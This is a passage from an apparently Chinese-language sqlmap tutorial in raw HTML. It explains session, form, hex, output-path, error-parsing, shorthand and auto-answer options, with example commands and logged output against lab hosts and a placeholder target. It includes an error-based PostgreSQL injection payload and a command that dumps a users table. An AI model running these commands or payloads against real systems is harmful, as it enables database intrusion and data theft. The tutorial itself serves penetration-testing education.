Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">100%&nbsp;[===================================================]&nbsp;64\/64<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:53]&nbsp;[INFO]&nbsp;retrieved:&nbsp;Oracle&nbsp;Database&nbsp;10g&nbsp;Enterprise&nbsp;Edition&nbsp;Release&nbsp;10.2.0.1.0&nbsp;&#8211;&nbsp;Prod<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;PHP&nbsp;5.2.6,&nbsp;Apache&nbsp;2.2.9<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;Oracle<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">banner:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;Oracle&nbsp;Database&nbsp;10g&nbsp;Enterprise&nbsp;Edition&nbsp;Release&nbsp;10.2.0.1.0&nbsp;&#8211;&nbsp;Prod&#8217;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u5148\u8f93\u51fa\u957f\u5ea6\uff0c\u9884\u8ba1\u5b8c\u6210\u65f6\u95f4\uff0c\u663e\u793a\u767e\u5206\u6bd4\uff0c\u8f93\u51fa\u5b57\u7b26<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%B7%E6%96%B0session%E6%96%87%E4%BB%B6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5237\u65b0session\u6587\u4ef6<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;flush-session<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u5982\u679c\u4e0d\u60f3\u7528\u4e4b\u524d\u7f13\u5b58\u8fd9\u4e2a\u76ee\u6807\u7684<span>session<\/span><span>\u6587\u4ef6\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u3002&nbsp;\u4f1a\u6e05\u7a7a\u4e4b\u524d\u7684<\/span><span>session<\/span><span>\uff0c\u91cd\u65b0\u6d4b\u8bd5\u8be5\u76ee\u6807\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%87%AA%E5%8A%A8%E8%8E%B7%E5%8F%96form%E8%A1%A8%E5%8D%95%E6%B5%8B%E8%AF%95\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u81ea\u52a8\u83b7\u53d6form\u8868\u5355\u6d4b\u8bd5<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;forms<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u4f60\u60f3\u5bf9\u4e00\u4e2a\u9875\u9762\u7684<span>form<\/span><span>\u8868\u5355\u4e2d\u7684\u53c2\u6570\u6d4b\u8bd5\uff0c\u53ef\u4ee5\u4f7f\u7528<\/span><span>-r<\/span><span>\u53c2\u6570\u8bfb\u53d6\u8bf7\u6c42\u6587\u4ef6\uff0c\u6216\u8005\u901a\u8fc7<\/span><span>&#8211;data<\/span><span>\u53c2\u6570\u6d4b\u8bd5\u3002&nbsp;\u4f46\u662f\u5f53\u4f7f\u7528<\/span><span>&#8211;forms<\/span><span>\u53c2\u6570\u65f6\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u81ea\u52a8\u4ece<\/span><span>-u<\/span><span>\u4e2d\u7684<\/span><span>url<\/span><span>\u83b7\u53d6\u9875\u9762\u4e2d\u7684\u8868\u5355\u8fdb\u884c\u6d4b\u8bd5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" 
id=\"%E5%BF%BD%E7%95%A5%E5%9C%A8%E4%BC%9A%E8%AF%9D%E6%96%87%E4%BB%B6%E4%B8%AD%E5%AD%98%E5%82%A8%E7%9A%84%E6%9F%A5%E8%AF%A2%E7%BB%93%E6%9E%9C\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5ffd\u7565\u5728\u4f1a\u8bdd\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684\u67e5\u8be2\u7ed3\u679c<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;fresh-queries<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5ffd\u7565<span>session<\/span><span>\u6587\u4ef6\u4fdd\u5b58\u7684\u67e5\u8be2\uff0c\u91cd\u65b0\u67e5\u8be2\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BD%BF%E7%94%A8DBMS%E7%9A%84hex%E5%87%BD%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4f7f\u7528DBMS\u7684hex\u51fd\u6570<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;hex<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u65f6\u5019\u5b57\u7b26\u7f16\u7801\u7684\u95ee\u9898\uff0c\u53ef\u80fd\u5bfc\u81f4\u6570\u636e\u4e22\u5931\uff0c\u53ef\u4ee5\u4f7f\u7528<span>hex<\/span><span>\u51fd\u6570\u6765\u907f\u514d\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9488\u5bf9<span>PostgreSQL<\/span><span>\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.48.130\/sqlmap\/pgsql\/get_int.php?id=1&#8221;&nbsp;&#8211;banner&nbsp;&#8211;hex&nbsp;-v&nbsp;3&nbsp;&#8211;parse-errors<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;fetching&nbsp;banner<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[PAYLOAD]&nbsp;1&nbsp;AND&nbsp;5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION()&nbsp;AS&nbsp;CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58))&nbsp;AS&nbsp;NUMERIC)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">[xx:xx:15]&nbsp;[INFO]&nbsp;parsed&nbsp;error&nbsp;message:&nbsp;&#8216;pg_query()&nbsp;[&lt;a&nbsp;href=&#8217;function.pg-query&#8217;&gt;function.pg-query&lt;\/a&gt;]:&nbsp;Query&nbsp;failed:&nbsp;ERROR:&nbsp;&nbsp;invalid&nbsp;input&nbsp;syntax&nbsp;for&nbsp;type&nbsp;numeric:&nbsp;&#8220;:vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:&#8221;&nbsp;in&nbsp;&lt;b&gt;\/var\/www\/sqlmap\/libs\/pgsql.inc.php&lt;\/b&gt;&nbsp;on&nbsp;line&nbsp;&lt;b&gt;35&lt;\/b&gt;&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:15]&nbsp;[INFO]&nbsp;retrieved:&nbsp;PostgreSQL&nbsp;8.3.9&nbsp;on&nbsp;i486-pc-linux-gnu,&nbsp;compiled&nbsp;by<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">GCC&nbsp;gcc-4.3.real&nbsp;(Debian&nbsp;4.3.2-1.1)&nbsp;4.3.2<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%87%AA%E5%AE%9A%E4%B9%89%E8%BE%93%E5%87%BA%E7%9A%84%E8%B7%AF%E5%BE%84\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u81ea\u5b9a\u4e49\u8f93\u51fa\u7684\u8def\u5f84<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;output-dir<\/span><\/span><span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u9ed8\u8ba4\u628a<\/span><span>session<\/span><span>\u6587\u4ef6\u8ddf\u7ed3\u679c\u6587\u4ef6\u4fdd\u5b58\u5728<\/span><span>output<\/span><span>\u6587\u4ef6\u5939\u4e0b\uff0c\u7528\u6b64\u53c2\u6570\u53ef\u81ea\u5b9a\u4e49\u8f93\u51fa\u8def\u5f84&nbsp;\u4f8b\u5982\uff1a<\/span><span>&#8211;output-dir=\/tmp<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BB%8E%E5%93%8D%E5%BA%94%E4%B8%AD%E8%8E%B7%E5%8F%96DBMS%E7%9A%84%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4ece\u54cd\u5e94\u4e2d\u83b7\u53d6DBMS\u7684\u9519\u8bef\u4fe1\u606f<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;parse-errors<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u65f6\u76ee\u6807\u6ca1\u6709\u5173\u95ed<span>DBMS<\/span><span>\u7684\u62a5\u9519\uff0c\u5f53\u6570\u636e\u5e93\u8bed\u53e5\u9519\u8bef\u65f6\uff0c\u4f1a\u8f93\u51fa\u9519\u8bef\u8bed\u53e5\uff0c\u7528\u6b64\u53c2\u6570\u53ef\u4ee5\u56de\u663e\u51fa\u9519\u8bef\u4fe1\u606f\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier
New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.21.129\/sqlmap\/mssql\/iis\/get_int.asp?id=1&#8221;&nbsp;&#8211;parse-errors<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[11:12:17]&nbsp;[INFO]&nbsp;ORDER&nbsp;BY&nbsp;technique&nbsp;seems&nbsp;to&nbsp;be&nbsp;usable.&nbsp;This&nbsp;should&nbsp;reduce&nbsp;the&nbsp;time&nbsp;needed&nbsp;to&nbsp;find&nbsp;the&nbsp;right&nbsp;number&nbsp;of&nbsp;query&nbsp;columns.&nbsp;Automatically&nbsp;extending&nbsp;the&nbsp;range&nbsp;for&nbsp;current&nbsp;UNION&nbsp;query&nbsp;injection&nbsp;technique&nbsp;test<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[11:12:17]&nbsp;[INFO]&nbsp;parsed&nbsp;error&nbsp;message:&nbsp;&#8216;Microsoft&nbsp;OLE&nbsp;DB&nbsp;Provider&nbsp;for&nbsp;ODBC&nbsp;Drivers&nbsp;(0x80040E14)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[Microsoft][ODBC&nbsp;SQL&nbsp;Server&nbsp;Driver][SQL&nbsp;Server]The&nbsp;ORDER&nbsp;BY&nbsp;position&nbsp;number&nbsp;10&nbsp;is&nbsp;out&nbsp;of&nbsp;range&nbsp;of&nbsp;the&nbsp;number&nbsp;of&nbsp;items&nbsp;in&nbsp;the&nbsp;select&nbsp;list.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&lt;b&gt;\/sqlmap\/mssql\/iis\/get_int.asp,&nbsp;line&nbsp;27&lt;\/b&gt;&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">[11:12:17]&nbsp;[INFO]&nbsp;parsed&nbsp;error&nbsp;message:&nbsp;&#8216;Microsoft&nbsp;OLE&nbsp;DB&nbsp;Provider&nbsp;for&nbsp;ODBC&nbsp;Drivers&nbsp;(0x80040E14)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[Microsoft][ODBC&nbsp;SQL&nbsp;Server&nbsp;Driver][SQL&nbsp;Server]The&nbsp;ORDER&nbsp;BY&nbsp;position&nbsp;number&nbsp;6&nbsp;is&nbsp;out&nbsp;of&nbsp;range&nbsp;of&nbsp;the&nbsp;number&nbsp;of&nbsp;items&nbsp;in&nbsp;the&nbsp;select&nbsp;list.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&lt;b&gt;\/sqlmap\/mssql\/iis\/get_int.asp,&nbsp;line&nbsp;27&lt;\/b&gt;&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[11:12:17]&nbsp;[INFO]&nbsp;parsed&nbsp;error&nbsp;message:&nbsp;&#8216;Microsoft&nbsp;OLE&nbsp;DB&nbsp;Provider&nbsp;for&nbsp;ODBC&nbsp;Drivers&nbsp;(0x80040E14)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[Microsoft][ODBC&nbsp;SQL&nbsp;Server&nbsp;Driver][SQL&nbsp;Server]The&nbsp;ORDER&nbsp;BY&nbsp;position&nbsp;number&nbsp;4&nbsp;is&nbsp;out&nbsp;of&nbsp;range&nbsp;of&nbsp;the&nbsp;number&nbsp;of&nbsp;items&nbsp;in&nbsp;the&nbsp;select&nbsp;list.<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&lt;b&gt;\/sqlmap\/mssql\/iis\/get_int.asp,&nbsp;line&nbsp;27&lt;\/b&gt;&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">[11:12:17]&nbsp;[INFO]&nbsp;target&nbsp;URL&nbsp;appears&nbsp;to&nbsp;have&nbsp;3&nbsp;columns&nbsp;in&nbsp;query<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E5%85%B6%E4%BB%96%E7%9A%84%E4%B8%80%E4%BA%9B%E5%8F%82%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u5176\u4ed6\u7684\u4e00\u4e9b\u53c2\u6570<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BD%BF%E7%94%A8%E5%8F%82%E6%95%B0%E7%BC%A9%E5%86%99\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4f7f\u7528\u53c2\u6570\u7f29\u5199<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-z<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u65f6\u4f7f\u7528\u7684\u53c2\u6570\u592a\u957f\u592a\u590d\u6742\uff0c\u53ef\u4ee5\u4f7f\u7528\u7f29\u5199\u6a21\u5f0f\u3002&nbsp;\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier
New';\">python&nbsp;sqlmap.py&nbsp;&#8211;batch&nbsp;&#8211;random-agent&nbsp;&#8211;ignore-proxy&nbsp;&#8211;technique=BEU&nbsp;-u&nbsp;&#8220;www.target.com\/vuln.php?id=1&#8221;&nbsp;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u5199\u6210\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-z&nbsp;&#8220;bat,randoma,ign,tec=BEU&#8221;&nbsp;-u&nbsp;&#8220;www.target.com\/vuln.php?id=1&#8221;&nbsp;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd8\u6709\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;&#8211;ignore-proxy&nbsp;&#8211;flush-session&nbsp;&#8211;technique=U&nbsp;&#8211;dump&nbsp;-D&nbsp;testdb&nbsp;-T&nbsp;users&nbsp;-u&nbsp;&#8220;www.target.com\/vuln.php?id=1&#8221;&nbsp;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u5199\u6210\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-z&nbsp;&#8220;ign,flu,bat,tec=U,dump,D=testdb,T=users&#8221;&nbsp;-u&nbsp;&#8220;www.target.com\/vuln.php?id=1&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" 
id=\"%E6%88%90%E5%8A%9FSQL%E6%B3%A8%E5%85%A5%E6%97%B6%E8%AD%A6%E5%91%8A\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6210\u529fSQL\u6ce8\u5165\u65f6\u8b66\u544a&nbsp;<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;alert<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9A%E4%BC%9A%E5%8F%91%E7%9A%84%E7%AD%94%E6%A1%88\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9a\u4f1a\u53d1\u7684\u7b54\u6848<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;answers<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u5e0c\u671b<span>sqlmap<\/span><span>\u63d0\u51fa\u8f93\u5165\u65f6\uff0c\u81ea\u52a8\u8f93\u5165\u81ea\u5df1\u60f3\u8981\u7684\u7b54\u6848\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff1a&nbsp;\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.22.128\/sqlmap\/mysql\/get_int.php?id=1&#8221;&nbsp;&#8211;technique=E&nbsp;&#8211;answers=&#8221;extending=N&#8221;&nbsp;&#8211;batch<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier
New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:56]&nbsp;[INFO]&nbsp;testing&nbsp;for&nbsp;SQL&nbsp;injection&nbsp;on&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">heuristic&nbsp;(parsing)&nbsp;test&nbsp;showed&nbsp;that&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;could&nbsp;be&nbsp;&#8216;MySQL&#8217;.&nbsp;Do&nbsp;you&nbsp;want&nbsp;to&nbsp;skip&nbsp;test&nbsp;payloads&nbsp;specific&nbsp;for&nbsp;other&nbsp;DBMSes?&nbsp;[Y\/n]&nbsp;Y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:56]&nbsp;[INFO]&nbsp;do&nbsp;you&nbsp;want&nbsp;to&nbsp;include&nbsp;all&nbsp;tests&nbsp;for&nbsp;&#8216;MySQL&#8217;&nbsp;extending&nbsp;provided&nbsp;level&nbsp;(1)&nbsp;and&nbsp;risk&nbsp;(1)?&nbsp;[Y\/n]&nbsp;N<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%8F%91%E7%8E%B0SQL%E6%B3%A8%E5%85%A5%E6%97%B6%E5%8F%91%E5%87%BA%E8%9C%82%E9%B8%A3%E5%A3%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u53d1\u73b0SQL\u6ce8\u5165\u65f6\u53d1\u51fa\u8702\u9e23\u58f0<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span 
